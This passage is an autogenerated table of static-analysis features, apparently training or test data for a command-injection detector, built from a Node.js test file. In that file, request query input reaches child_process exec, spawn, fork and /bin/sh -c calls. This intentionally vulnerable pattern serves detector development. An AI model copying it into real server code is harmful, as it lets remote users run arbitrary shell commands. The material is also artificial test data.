+| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:8:23:11 | fork | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:8:23:11 | fork | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:8:23:11 | fork | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:8:23:11 | fork | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:8:23:11 | fork | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:13:23:15 | cmd | CalleeFlexibleAccessPath | cp.fork | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:13:23:15 | cmd | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:13:23:15 | cmd | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:13:23:15 | cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:13:23:15 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:13:23:15 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:13:23:15 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:13:23:15 | cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:13:23:15 | cmd | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:5:25:6 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:5:25:6 | cp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:5:25:6 | cp | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:5:25:6 | cp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:5:25:6 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:5:25:11 | cp.exec | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:5:25:11 | cp.exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:5:25:11 | cp.exec | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:5:25:11 | cp.exec | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:5:25:11 | cp.exec | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:5:25:32 | cp.exec ... "bar") | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:5:25:32 | cp.exec ... "bar") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:5:25:32 | cp.exec ... "bar") | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:5:25:32 | cp.exec ... "bar") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:5:25:32 | cp.exec ... "bar") | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:5:25:32 | exceptional return of cp.exec ... "bar") | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:5:25:32 | exceptional return of cp.exec ... "bar") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:5:25:32 | exceptional return of cp.exec ... "bar") | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:5:25:32 | exceptional return of cp.exec ... "bar") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:5:25:32 | exceptional return of cp.exec ... "bar") | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:8:25:11 | exec | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:8:25:11 | exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:8:25:11 | exec | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:8:25:11 | exec | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:8:25:11 | exec | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:13:25:17 | "foo" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:13:25:17 | "foo" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:13:25:17 | "foo" | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:13:25:17 | "foo" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:13:25:17 | "foo" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:13:25:17 | "foo" | stringConcatenatedWith | -endpoint- cmd + 'bar' | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:13:25:23 | "foo" + cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:13:25:23 | "foo" + cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:13:25:23 | "foo" + cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:13:25:23 | "foo" + cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:13:25:23 | "foo" + cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:13:25:31 | "foo" + cmd + "bar" | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:13:25:31 | "foo" + cmd + "bar" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:13:25:31 | "foo" + cmd + "bar" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:13:25:31 | "foo" + cmd + "bar" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:13:25:31 | "foo" + cmd + "bar" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:13:25:31 | "foo" + cmd + "bar" | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:13:25:31 | "foo" + cmd + "bar" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:13:25:31 | "foo" + cmd + "bar" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:13:25:31 | "foo" + cmd + "bar" | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:21:25:23 | cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:21:25:23 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:21:25:23 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:21:25:23 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:21:25:23 | cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:21:25:23 | cmd | stringConcatenatedWith | 'foo' -endpoint- 'bar' | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:27:25:31 | "bar" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:27:25:31 | "bar" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:27:25:31 | "bar" | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:27:25:31 | "bar" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:27:25:31 | "bar" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:27:25:31 | "bar" | stringConcatenatedWith | 'foo' + cmd -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:5:28:6 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:5:28:6 | cp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:5:28:6 | cp | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:5:28:6 | cp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:5:28:6 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:5:28:11 | cp.exec | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:5:28:11 | cp.exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:5:28:11 | cp.exec | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:5:28:11 | cp.exec | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:5:28:11 | cp.exec | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:5:28:32 | cp.exec ... : cmd}) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:5:28:32 | cp.exec ... : cmd}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:5:28:32 | cp.exec ... : cmd}) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:5:28:32 | cp.exec ... : cmd}) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:5:28:32 | cp.exec ... : cmd}) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:5:28:32 | exceptional return of cp.exec ... : cmd}) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:5:28:32 | exceptional return of cp.exec ... : cmd}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:5:28:32 | exceptional return of cp.exec ... : cmd}) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:5:28:32 | exceptional return of cp.exec ... : cmd}) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:5:28:32 | exceptional return of cp.exec ... : cmd}) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:8:28:11 | exec | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:8:28:11 | exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:8:28:11 | exec | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:8:28:11 | exec | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:8:28:11 | exec | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:13:28:17 | "foo" | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:13:28:17 | "foo" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:13:28:17 | "foo" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:13:28:17 | "foo" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:13:28:17 | "foo" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:13:28:17 | "foo" | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args 